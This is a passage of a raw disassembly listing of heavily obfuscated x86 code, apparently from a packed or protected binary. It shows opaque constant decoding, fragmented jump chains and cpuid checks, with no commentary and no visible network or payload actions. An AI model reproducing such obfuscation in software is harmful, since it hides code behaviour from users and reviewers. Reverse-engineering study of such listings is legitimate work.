; [00000001 BYTES: COLLAPSED FUNCTION nullsub_57. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423172
loc_429FD5: ; CODE XREF: sub_423172+1AB0�j
jmp loc_42DFB8
; END OF FUNCTION CHUNK FOR sub_423172
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_183. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429FDB: ; CODE XREF: _7hdaygc1:0042C8EB�j
jmp locret_423416
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428498
loc_429FE0: ; CODE XREF: sub_428498+1E05�j
pop esi
sub edi, 0FECEEB8Dh
xor edi, 0E497A0F2h
cmp edi, 52F3000Dh
jmp loc_42C0B1
; END OF FUNCTION CHUNK FOR sub_428498
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425360
loc_429FF8: ; CODE XREF: sub_425360:loc_42A46E�j
rol ebx, 17h
sub ebx, 4C39C551h
or ebx, 74B61A23h
xor ebx, 474E7705h
jmp loc_42B5F7
; END OF FUNCTION CHUNK FOR sub_425360
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB2C
loc_42A012: ; CODE XREF: sub_42EB2C+D�j
push 6D709453h
; END OF FUNCTION CHUNK FOR sub_42EB2C
; START OF FUNCTION CHUNK FOR sub_425A37
loc_42A017: ; CODE XREF: sub_425A37:loc_42CB9B�j
pop eax
or eax, 7927A05Bh
add eax, ds:4000FBh
and eax, 2C785EF6h
add eax, 0DC2A41EEh
mov eax, [eax]
call sub_424744
locret_42A037: ; CODE XREF: sub_42D471+8�j
retn
; END OF FUNCTION CHUNK FOR sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429098
loc_42A038: ; CODE XREF: _7hdaygc1:0042803D�j
; sub_429098+11�j
jmp loc_42532F
; END OF FUNCTION CHUNK FOR sub_429098
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42A03E: ; CODE XREF: sub_425C3B+9BA0�j
jmp loc_429976
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFFE
loc_42A043: ; CODE XREF: sub_42AFFE+4039�j
jmp loc_42EB9B
; END OF FUNCTION CHUNK FOR sub_42AFFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4F1
loc_42A048: ; CODE XREF: sub_42A4F1-415E�j
jmp nullsub_164
; END OF FUNCTION CHUNK FOR sub_42A4F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425752
loc_42A04D: ; CODE XREF: sub_425752-1D71�j
jmp loc_426014
; END OF FUNCTION CHUNK FOR sub_425752
; =============== S U B R O U T I N E =======================================
sub_42A052 proc near ; CODE XREF: sub_42B0DC:loc_4254FF�p
; _7hdaygc1:004288AB�j
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423B7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424809 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426417 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00427F96 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429A54 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042A47E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A898 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B96F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CBB5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042DB87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F503 SIZE 00000005 BYTES
xchg edx, [esp+4+var_4]
pop edx
xchg edi, [esp+0]
mov ecx, edi
pop edi
mov eax, ds:dword_42E188
or eax, eax
jmp loc_42F503
sub_42A052 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426315
loc_42A069: ; CODE XREF: sub_426315+10�j
push 3FC93B63h
pop eax
rol eax, 0Bh
xor eax, 0A9487AA6h
add eax, ebp
add eax, 1F6C9C8Ch
mov eax, [eax]
jmp loc_42DD27
; END OF FUNCTION CHUNK FOR sub_426315
; ---------------------------------------------------------------------------
push 472DA13Bh
pop edx
sub edx, 0CA2D35B3h
and edx, 25CBC135h
sub edx, 0FAE9A8ECh
add edx, 83EE7363h
call sub_42C1AF
jmp loc_424043
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42A0AF: ; CODE XREF: sub_4291EA:loc_428409�j
mov eax, [ebp+var_4]
pop ecx
xchg ecx, [esp-8+arg_0]
mov ebp, ecx
xchg esi, [esp-8+arg_0]
jmp loc_4243C9
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA6A
loc_42A0C0: ; CODE XREF: sub_42EA6A+D�j
rol eax, 11h
push ebx
mov ebx, eax
push offset sub_42F8B0
jmp nullsub_178
; END OF FUNCTION CHUNK FOR sub_42EA6A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42A0D0: ; CODE XREF: sub_42C16F:loc_42D6F5�j
jge loc_42705B
loc_42A0D6: ; CODE XREF: sub_42D9E1-1457�j
jmp loc_4283A6
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_42A0DB: ; CODE XREF: _7hdaygc1:004247BE�j
jmp loc_42DE95
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42A0E0: ; CODE XREF: sub_423DFC+16�j
jmp loc_424665
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
or edi, 24EE01DAh
or edx, ebx
loc_42A0ED: ; CODE XREF: _7hdaygc1:00425DB6�j
jmp loc_427053
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C6A0
loc_42A0F2: ; CODE XREF: sub_42C6A0-1F1F�j
sub eax, [ebp-28h]
mov [ebp-24h], eax
mov eax, [ebp-24h]
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42C6A0
; ---------------------------------------------------------------------------
loc_42A0FF: ; CODE XREF: _7hdaygc1:00426833�j
jmp locret_4231B6
; =============== S U B R O U T I N E =======================================
sub_42A104 proc near ; CODE XREF: sub_42E51C:loc_42A775�p
; sub_42E1F1+4�p
; FUNCTION CHUNK AT 00425AE1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042F0A0 SIZE 00000014 BYTES
push ebp
jmp loc_425AE1
sub_42A104 endp
; ---------------------------------------------------------------------------
loc_42A10A: ; CODE XREF: _7hdaygc1:0042A5CD�j
xchg edx, [esp]
jmp loc_42F9CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295F7
loc_42A112: ; CODE XREF: sub_4295F7-1443�j
; _7hdaygc1:004281CC�j ...
add esi, 0F0425B4Dh
xchg esi, [esp+0]
jmp loc_4297C9
; END OF FUNCTION CHUNK FOR sub_4295F7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_198. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EFF5
loc_42A121: ; CODE XREF: sub_42EFF5+7�j
jmp nullsub_214
; END OF FUNCTION CHUNK FOR sub_42EFF5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A607
loc_42A126: ; CODE XREF: sub_42A607+B�j
xchg ecx, [esp+0]
jmp sub_42E29B
; END OF FUNCTION CHUNK FOR sub_42A607
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_42A12E: ; CODE XREF: sub_42C50D:loc_42C3FB�j
jle loc_42C34A
push ebp
jmp loc_423D3A
; END OF FUNCTION CHUNK FOR sub_42C50D
; ---------------------------------------------------------------------------
loc_42A13A: ; CODE XREF: _7hdaygc1:00425ADC�j
jp loc_4250D6
; START OF FUNCTION CHUNK FOR sub_42EF91
loc_42A140: ; CODE XREF: sub_42EF91-2611�j
add edi, 5A50B31Eh
popf
xchg edi, [esp+18h+var_18]
jmp loc_42E057
; END OF FUNCTION CHUNK FOR sub_42EF91
; ---------------------------------------------------------------------------
lea eax, [ebp-14h]
jmp loc_42A1F0
; ---------------------------------------------------------------------------
jb loc_42B085
jmp sub_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42A162: ; CODE XREF: sub_424AE1:loc_42546D�j
pop esi
rol esi, 7
add esi, 7D118D8Ah
sub esi, 7BD0A1Ah
call sub_42C002
; END OF FUNCTION CHUNK FOR sub_424AE1
; START OF FUNCTION CHUNK FOR sub_429C1F
loc_42A177: ; CODE XREF: sub_429C1F+B�j
jmp loc_42852A
; END OF FUNCTION CHUNK FOR sub_429C1F
; =============== S U B R O U T I N E =======================================
sub_42A17C proc near ; CODE XREF: sub_423B20+4C20�p
; _7hdaygc1:0042A53F�j
; FUNCTION CHUNK AT 0042AF83 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042BE02 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C1D8 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042C33F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DBD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042ED93 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042F6BD SIZE 00000010 BYTES
xchg ebx, [esp+0]
pop ebx
or eax, eax
jnz loc_426493
jmp loc_42C33F
sub_42A17C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BA2C
loc_42A18D: ; CODE XREF: sub_42BA2C-2A49�j
xchg edi, esi
sbb ecx, ebp
popf
xor esi, eax
jmp loc_42FB07
; END OF FUNCTION CHUNK FOR sub_42BA2C
; =============== S U B R O U T I N E =======================================
sub_42A199 proc near ; DATA XREF: _7hdaygc1:0042D58A�o
push esi
sub_42A199 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424AE1
loc_42A19A: ; CODE XREF: sub_424AE1:loc_426671�j
push 0F6681AB2h
pop esi
and esi, 0C334B41Eh
xor esi, 0C2201016h
xchg esi, [esp+0]
pushf
jmp loc_429BED
; END OF FUNCTION CHUNK FOR sub_424AE1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_146. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42A1B6 proc near ; CODE XREF: sub_425C3B:loc_429BAD�p
; _7hdaygc1:0042EC29�j
; FUNCTION CHUNK AT 004259B5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042957B SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B4CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C25C SIZE 0000000F BYTES
xchg edx, [esp+0]
pop edx
mov eax, [eax]
cmp eax, [ebp-0Ch]
jnz loc_42DF67
loc_42A1C5: ; CODE XREF: sub_425F27+44BE�j
jmp loc_42B4CA
sub_42A1B6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push offset loc_429C47
jmp loc_42E59E
; ---------------------------------------------------------------------------
loc_42A1D4: ; DATA XREF: _7hdaygc1:0042BAB1�o
sub ecx, eax
xor eax, eax
mov al, [ebp-9]
shl eax, cl
mov cl, [ebp-0Bh]
xor edx, edx
mov dl, [ebp-9]
jmp loc_42D47E
; ---------------------------------------------------------------------------
loc_42A1EA: ; CODE XREF: _7hdaygc1:loc_42F9C8�j
jnz loc_423092
loc_42A1F0: ; CODE XREF: _7hdaygc1:0042A152�j
jmp loc_4230DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291EA
loc_42A1F5: ; CODE XREF: sub_4291EA+9�j
jmp loc_42C6E1
; END OF FUNCTION CHUNK FOR sub_4291EA
; ---------------------------------------------------------------------------
push 3132317Ch
ror edi, 0Eh
jmp loc_42308B
; ---------------------------------------------------------------------------
loc_42A207: ; DATA XREF: sub_42E0C4-7943�o
add eax, 5F43F0D0h
mov eax, [eax]
or eax, eax
jnz loc_42827D
jmp loc_42EE16
; ---------------------------------------------------------------------------
loc_42A21C: ; CODE XREF: _7hdaygc1:0042BFFD�j
pushf
loc_42A21D: ; CODE XREF: _7hdaygc1:0042BFEE�j
rol edx, 1Dh
xor edx, 0CB3D1827h
rol edx, 0Bh
add edx, 366F2719h
xchg edx, [esp]
jmp loc_42923E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_134. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
push eax
pop ebp
xchg ebp, [esp]
call sub_428948
; START OF FUNCTION CHUNK FOR sub_42C3E4
loc_42A243: ; CODE XREF: sub_42C3E4+7�j
jmp loc_42B67E
; END OF FUNCTION CHUNK FOR sub_42C3E4
; ---------------------------------------------------------------------------
loc_42A248: ; CODE XREF: _7hdaygc1:0042507E�j
jmp loc_42F729
; ---------------------------------------------------------------------------
loc_42A24D: ; CODE XREF: _7hdaygc1:00425377�j
mov eax, 481AC4h
call sub_42AA07
call sub_423F02
loc_42A25C: ; CODE XREF: _7hdaygc1:loc_42CD49�j
test al, al
jz loc_42CE05
jmp loc_427E3F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42A269: ; CODE XREF: sub_42E283-21EB�j
or edx, 0A7D9AD60h
push ebx
loc_42A270: ; CODE XREF: sub_42E283:loc_429AB5�j
call sub_4290DB
retn
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42A276: ; CODE XREF: sub_42C16F-784A�j
jmp loc_42DCEE
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E283
loc_42A27B: ; CODE XREF: sub_42E283�j
xor eax, eax
jmp loc_425883
; END OF FUNCTION CHUNK FOR sub_42E283
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425492
loc_42A282: ; CODE XREF: sub_425492+1C16�j
jz loc_423D9E
jmp loc_429669
; END OF FUNCTION CHUNK FOR sub_425492
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428498
loc_42A28D: ; CODE XREF: sub_428498+35A6�j
; DATA XREF: sub_428F69+38CE�o
mov ebp, esp
add esp, 0FFFFFFE4h
push edi
push 0DE2649C6h
xchg esi, [esp+0]
mov edi, esi
jmp loc_429FE0
; END OF FUNCTION CHUNK FOR sub_428498
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_42A2A2: ; CODE XREF: sub_42C443:loc_42C399�j
add ebx, 0FAA21C62h
xchg ebx, [esp+0]
jmp sub_423D07
; END OF FUNCTION CHUNK FOR sub_42C443
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_201. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42911B
loc_42A2B1: ; CODE XREF: sub_42911B:loc_424525�j
sub ebx, 326204B9h
cmp ebx, 0C86291EDh
jmp loc_42B096
; END OF FUNCTION CHUNK FOR sub_42911B
; ---------------------------------------------------------------------------
test ecx, ebx
jmp loc_428AF1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_42A2C9: ; CODE XREF: sub_42C16F:loc_426157�j
push 158F143Dh
pop eax
rol eax, 1Eh
or eax, 0C5350FECh
sub eax, 3894BB9Eh
add eax, 48B12F0Eh
jmp loc_42591F
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_42A2E9: ; CODE XREF: _7hdaygc1:0042A4FF�j
xor eax, 38D56A3Bh
; =============== S U B R O U T I N E =======================================
sub_42A2EF proc near ; CODE XREF: _7hdaygc1:0042478F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423EA8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004248DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004252A9 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00425CC6 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004262E0 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00428711 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004294C0 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042A50C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0042BB34 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042CBFC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042D707 SIZE 00000005 BYTES
xchg edx, [esp+8+var_8]
pop edx
mov edx, [ebp-4]
jmp loc_42D707
sub_42A2EF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xor eax, [ebp-8]
mov byte ptr [eax], 5Bh
call sub_428C3B
xor eax, [ebp-8]
loc_42A309: ; CODE XREF: _7hdaygc1:00425859�j
inc eax
jmp loc_42D090
; ---------------------------------------------------------------------------
loc_42A30F: ; CODE XREF: _7hdaygc1:loc_42C884�j
add eax, 99BF2631h
and eax, 0F4DC366Eh
add eax, 0C4A7BD8Eh
add eax, ebp
add eax, 0A6C01E40h
jmp loc_42854A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EFBC
loc_42A32E: ; CODE XREF: sub_42EFBC:loc_423599�j
and eax, 0C6F219AEh
sub eax, 0F0DFCFA0h
rol eax, 17h
test eax, 10h
jmp loc_42350C
; END OF FUNCTION CHUNK FOR sub_42EFBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_42A348: ; CODE XREF: sub_423DFC:loc_42A705�j
push offset loc_42F001
jmp loc_42F6CE
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
add ecx, 89749833h
jmp sub_423CAC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F62
loc_42A35D: ; CODE XREF: sub_424F62:loc_425A08�j
jz loc_426F99
jmp loc_42D79D
; END OF FUNCTION CHUNK FOR sub_424F62
; ---------------------------------------------------------------------------
loc_42A368: ; DATA XREF: sub_423F3E+4979�o
jnb loc_42D728
add eax, [esp]
adc edx, [esp+4]
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_4237DA
jmp loc_428F43
; ---------------------------------------------------------------------------
loc_42A387: ; DATA XREF: sub_42F8DB-2C6F�o
add [esi], eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
jmp loc_426F9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42A394: ; CODE XREF: sub_42EBD6-6DF�j
mov eax, 1
xor edx, edx
cpuid
and eax, 0FFFh
jmp loc_42E6F9
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_42A3A7: ; CODE XREF: sub_425C3B:loc_429C13�j
; DATA XREF: _7hdaygc1:004237FA�o
push 56F04757h
pop eax
or eax, 2BFB784Bh
and eax, 3FFD8420h
xor eax, 0BD0AD497h
add eax, ebp
add eax, 7D0C2F49h
jmp loc_423E43
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D4B1
loc_42A3CC: ; CODE XREF: sub_42D4B1+10�j
mov eax, [ebp+8]
push eax
call sub_4273E3
; END OF FUNCTION CHUNK FOR sub_42D4B1
; START OF FUNCTION CHUNK FOR sub_425F27
loc_42A3D5: ; CODE XREF: sub_425F27:loc_423168�j
mov edi, eax
sub edx, 4B3ED65Bh
jbe loc_4255ED
xchg ecx, esi
jno loc_42A1C5
jmp loc_428E17
; END OF FUNCTION CHUNK FOR sub_425F27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272CF
loc_42A3F0: ; CODE XREF: sub_4272CF+6�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4272CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_42A3F2: ; CODE XREF: sub_423410+1BF2�j
jmp loc_42489A
; END OF FUNCTION CHUNK FOR sub_423410
; =============== S U B R O U T I N E =======================================
sub_42A3F7 proc near ; CODE XREF: sub_42BAE7-7F1B�p
; sub_42581B:loc_424814�p ...
push offset sub_42B01E
jmp nullsub_31
sub_42A3F7 endp
; =============== S U B R O U T I N E =======================================
sub_42A401 proc near ; DATA XREF: sub_4237DA+A14B�o
; FUNCTION CHUNK AT 0042D128 SIZE 00000005 BYTES
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_42D74C
loc_42A40D: ; CODE XREF: _7hdaygc1:004270AD�j
mov eax, [ebp-4]
mov [ebp-0Ch], eax
shl dword ptr [ebp-8], 8
jmp loc_42D128
sub_42A401 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42616B
loc_42A41C: ; CODE XREF: sub_42616B:loc_426658�j
jz loc_42435C
jmp loc_4255E1
; END OF FUNCTION CHUNK FOR sub_42616B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426130
loc_42A427: ; CODE XREF: sub_426130:loc_4286D9�j
or ebx, ds:4000F6h
cmp ebx, 0A8C6810Dh
jmp loc_42D8E4
; END OF FUNCTION CHUNK FOR sub_426130
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42524F
loc_42A438: ; CODE XREF: sub_42524F:loc_42907C�j
pop eax
loc_42A439: ; CODE XREF: _7hdaygc1:0042CBDC�j
rol eax, 0Ch
sub eax, 88898D49h
add eax, 0A58E9D92h
jmp loc_4236D6
; END OF FUNCTION CHUNK FOR sub_42524F
; ---------------------------------------------------------------------------
sub ebp, eax
jmp loc_42C601
; ---------------------------------------------------------------------------
loc_42A454: ; DATA XREF: sub_42ED2A-30B�o
mov byte ptr [eax], 0
push offset loc_425835
jmp loc_427D0C
; ---------------------------------------------------------------------------
loc_42A461: ; CODE XREF: _7hdaygc1:0042924A�j
pop ebp
; =============== S U B R O U T I N E =======================================
sub_42A462 proc near ; CODE XREF: sub_42A92E+92D�p
; FUNCTION CHUNK AT 0042E783 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042F79B SIZE 0000001A BYTES
xchg edx, [esp+0]
pop edx
mov edx, eax
jmp loc_42F79B
sub_42A462 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_70. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425360
loc_42A46E: ; CODE XREF: sub_425360+A�j
jmp loc_429FF8
; END OF FUNCTION CHUNK FOR sub_425360
; =============== S U B R O U T I N E =======================================
sub_42A473 proc near ; CODE XREF: _7hdaygc1:004232FF�j
; sub_42C50D:loc_425D16�p
xchg edx, [esp+0]
pop edx
mov ds:dword_42E188, eax
retn
sub_42A473 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_42A47E: ; CODE XREF: sub_42A052:loc_42B96F�j
; sub_42C50D-8E3�j
call sub_425D3F
; END OF FUNCTION CHUNK FOR sub_42A052
; START OF FUNCTION CHUNK FOR sub_42DB44
loc_42A483: ; CODE XREF: sub_42DB44+1C�j
xor ebx, ebx
xor ecx, ecx
xor edx, edx
cpuid
add [esi], eax
xor [esi], ebx
jmp loc_42495E
; END OF FUNCTION CHUNK FOR sub_42DB44
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8C4
loc_42A494: ; CODE XREF: sub_42F8C4-8C89�j
pop ecx
cmp dword ptr [ebp-8], 0
jbe loc_424FD0
jmp loc_42977C
; END OF FUNCTION CHUNK FOR sub_42F8C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429318
loc_42A4A4: ; CODE XREF: sub_429318:loc_42F053�j
jg loc_42AFBF
jmp loc_429F00
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
locret_42A4AF: ; CODE XREF: _7hdaygc1:loc_42FCA1�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427CC6
loc_42A4B0: ; CODE XREF: sub_427CC6+612A�j
jmp nullsub_72
; END OF FUNCTION CHUNK FOR sub_427CC6
; ---------------------------------------------------------------------------
db 0Fh, 8Ah, 0DCh
db 51h, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_42A4BB: ; CODE XREF: sub_42EBD6:loc_42E4E6�j
jmp loc_42BACF
; END OF FUNCTION CHUNK FOR sub_42EBD6
; ---------------------------------------------------------------------------
loc_42A4C0: ; CODE XREF: _7hdaygc1:0042F567�j
xchg edx, [edi]
; =============== S U B R O U T I N E =======================================
sub_42A4C2 proc near ; CODE XREF: sub_42D002:loc_4283FF�p
; FUNCTION CHUNK AT 00423603 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
add eax, 0C9A10329h
add eax, ebp
add eax, 0F9CFCC4h
push offset loc_4233B0
jmp loc_423603
sub_42A4C2 endp
; ---------------------------------------------------------------------------
push edx
mov edx, edi
xchg edx, [esp]
loc_42A4E4: ; CODE XREF: _7hdaygc1:loc_42EFCF�j
mov edi, eax
xchg edi, [esp]
ror eax, 8
jmp loc_42F7F3
; =============== S U B R O U T I N E =======================================
sub_42A4F1 proc near ; CODE XREF: sub_42FD2A�j
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00424ED3 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004251E8 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00425AC0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00426386 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042827D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004299F4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A048 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B3B3 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042DA96 SIZE 00000005 BYTES
push ebp
jmp loc_42B3B3
sub_42A4F1 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_148. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C48C
loc_42A4F8: ; CODE XREF: sub_42C48C-13B5�j
; _7hdaygc1:loc_42E638�j
jmp loc_42E238
; END OF FUNCTION CHUNK FOR sub_42C48C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_200. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop ebx
jmp loc_42A2E9
; ---------------------------------------------------------------------------
locret_42A504: ; CODE XREF: _7hdaygc1:loc_42F9A0�j
retn
; ---------------------------------------------------------------------------
xchg esi, edi
jmp sub_423DDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_42A50C: ; CODE XREF: sub_42A2EF:loc_4248DA�j
mov ecx, [ebp-30h]
push esi
push 0D0BFAA41h
pop esi
or esi, 7401839Bh
jnz loc_4297FA
loc_42A522: ; CODE XREF: sub_424755+953D�j
jmp loc_42CBFC
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
loc_42A527: ; CODE XREF: _7hdaygc1:00424DD4�j
jmp loc_42804B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42A52C: ; CODE XREF: sub_42AA07-47CF�j
add edx, 84F7A48Bh
mov [edx], eax
pop edx
mov eax, [ebp-4]
jmp loc_425423
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
sbb edi, ebx
jmp sub_42A17C
; ---------------------------------------------------------------------------
cmp edi, 0C61206A3h
jmp loc_427001
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E64
loc_42A54F: ; CODE XREF: sub_425E64+1438�j
; sub_425E64:loc_42EB02�j
mov eax, [ebp-4]
xor edx, edx
push esi
mov esi, edx
xchg esi, [esp+0]
jmp sub_42A6C3
; END OF FUNCTION CHUNK FOR sub_425E64
; ---------------------------------------------------------------------------
pushf
jmp sub_428E3C
; ---------------------------------------------------------------------------
loc_42A565: ; DATA XREF: sub_424680:loc_4244B0�o
cmp dword ptr [ebp-38h], 3FFFh
jle loc_42D225
jmp loc_42932E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_215. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42A578: ; CODE XREF: _7hdaygc1:loc_42C19A�j
jmp loc_42FBD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BE29
loc_42A57D: ; CODE XREF: sub_42BE29+10�j
lea eax, [ebp-0Ch]
push 6F76FE58h
xchg ebp, [esp+4+var_4]
mov ecx, ebp
pop ebp
rol ecx, 1Dh
jmp loc_42CEF1
; END OF FUNCTION CHUNK FOR sub_42BE29
; ---------------------------------------------------------------------------
loc_42A593: ; CODE XREF: _7hdaygc1:0042EF65�j
jge loc_42F142
; START OF FUNCTION CHUNK FOR sub_4253A0
loc_42A599: ; CODE XREF: sub_4253A0:loc_428F3D�j
or edi, 72C73209h
